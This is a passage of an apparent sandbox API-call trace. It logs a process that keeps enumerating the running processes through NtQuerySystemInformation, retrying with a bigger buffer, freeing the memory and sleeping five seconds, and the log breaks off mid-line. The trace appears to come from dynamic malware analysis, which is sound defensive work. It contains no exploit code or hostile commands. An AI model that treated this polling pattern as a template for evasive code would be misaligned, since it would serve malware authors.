[0215.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.720] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.746] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.847] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.857] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 